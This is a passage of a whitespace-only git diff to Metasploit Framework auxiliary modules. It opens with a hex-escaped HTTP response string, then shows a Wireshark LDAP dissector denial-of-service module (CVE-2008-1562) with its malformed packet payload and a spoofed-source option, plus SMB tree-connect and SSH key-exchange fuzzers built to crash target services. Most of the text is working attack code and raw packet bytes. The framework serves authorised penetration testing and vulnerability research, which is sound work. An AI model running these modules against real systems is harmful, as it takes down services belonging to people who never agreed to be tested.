"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') - + + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + pkt = n.pack - + capture_sendto(pkt, rhost) close_pcap diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index 53c93466f6..a740f62399 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - + def initialize super( 'Name' => 'Wireshark LDAP dissector DOS', @@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary [ [ 'CVE', '2008-1562' ], ], - 'DisclosureDate' => 'Mar 28 2008') - + 'DisclosureDate' => 'Mar 28 2008') + register_options([ OptInt.new('RPORT', [true, 'The destination port', 389]), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) ], self.class) - + deregister_options('FILTER','PCAPFILE') end @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending malformed LDAP packet to #{rhost}") m = Rex::Text.rand_text_alpha_lower(3) - + open_pcap n = Racket::Racket.new @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 - + n.l4 = Racket::L4::TCP.new n.l4.src_port = rand(65535)+1 n.l4.seq = rand(0x100000000) @@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary n.l4.window = 3072 n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016" - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') - + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + pkt = n.pack capture_sendto(pkt, rhost) diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index b1afceb9a4..bab2830802 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Tree Connect Request Fuzzer', @@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) end - + def do_smb_connect(pkt,opts={}) @connected = false connect simple.login( - datastore['SMBName'], + datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'] - ) - + ) + @connected = true simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}") end - + def run last_str = nil last_inp = nil last_err = nil - + cnt = 0 fuzz_strings do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_smb_connect(str, 0.25) rescue ::Interrupt @@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index 4b201576d7..a4f6cafad0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Tree Connect Request Corruption', @@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"]) ], self.class) end - + def do_smb_tree(pkt,opts={}) @connected = false connect simple.login( - datastore['SMBName'], + datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'] ) - + @connected = true sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run - + # Connect in order to get the server-assigned user-id connect smb_login pkt = make_smb_tree disconnect - + last_str = nil last_inp = nil last_err = nil - + cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB tree connect with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_tree(str, 0.25) rescue ::Interrupt @@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_tree share = datastore['SMBTREE'] pass = '' data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join(''); - + pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct simple.client.smb_defaults(pkt['Payload']['SMB']) - + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 19ead57ff7..b99c755d9e 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SSH Key Exchange Init Corruption', @@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_ssh_kexinit(pkt,opts={}) @connected = false connect @connected = true - + @banner = sock.get_once(-1,opts[:banner_timeout]) return if not @banner - + sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.put(pkt) sock.get_once(-1,opts[:kex_timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_kex_init cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SSH initial key exchange with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5) rescue ::Interrupt @@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + if(not @banner) print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ") return @@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary last_inp = @last_fuzzer_input end end - + def make_kex_init - [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, - 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, - 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, - 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, - 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, - 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, - 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, - 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, - 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, - 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, - 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, - 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, - 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, - 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, - 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, - 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, - 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, - 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, - 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, - 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, - 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, - 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, - 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, - 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, - 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, - 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, - 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, - 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, - 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, - 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, - 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, - 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, - 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, - 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, - 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, - 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, - 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, - 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, - 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, - 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, - 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, - 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, - 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, - 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, - 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, - 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, - 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, - 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, - 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, - 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, - 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, - 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, - 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, - 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, - 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, - 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, - 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, - 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, - 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, - 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, - 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, - 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, - 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, - 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, - 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, - 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, - 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, - 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, - 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, - 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, - 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, - 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, - 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, - 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, - 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, - 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, - 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, - 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, - 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, - 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, - 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, - 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, - 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, - 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, - 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, - 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, - 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, - 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, - 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, - 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, - 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, - 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, - 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, + 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, + 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, + 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, + 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, + 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, + 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, + 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, + 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, + 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, + 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, + 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, + 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, + 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, + 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, + 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, + 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, + 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, + 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, + 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, + 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, + 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, + 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, + 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, + 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, + 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, + 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, + 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, + 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, + 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, + 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, + 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, + 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, + 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, + 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, + 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, + 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, + 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, + 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, + 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, + 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, + 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, + 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, + 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, + 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, + 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, + 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, + 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, + 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, + 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, + 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, + 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, + 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, + 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, + 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, + 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, + 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, + 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, + 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, + 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, + 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, + 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, + 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, + 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, + 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, + 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, + 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, + 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, + 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, + 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, + 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, + 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, + 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, + 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, + 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, + 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, + 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, + 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, + 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, + 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, + 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, + 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, + 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, + 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, + 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, + 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, + 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, + 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, + 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, + 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 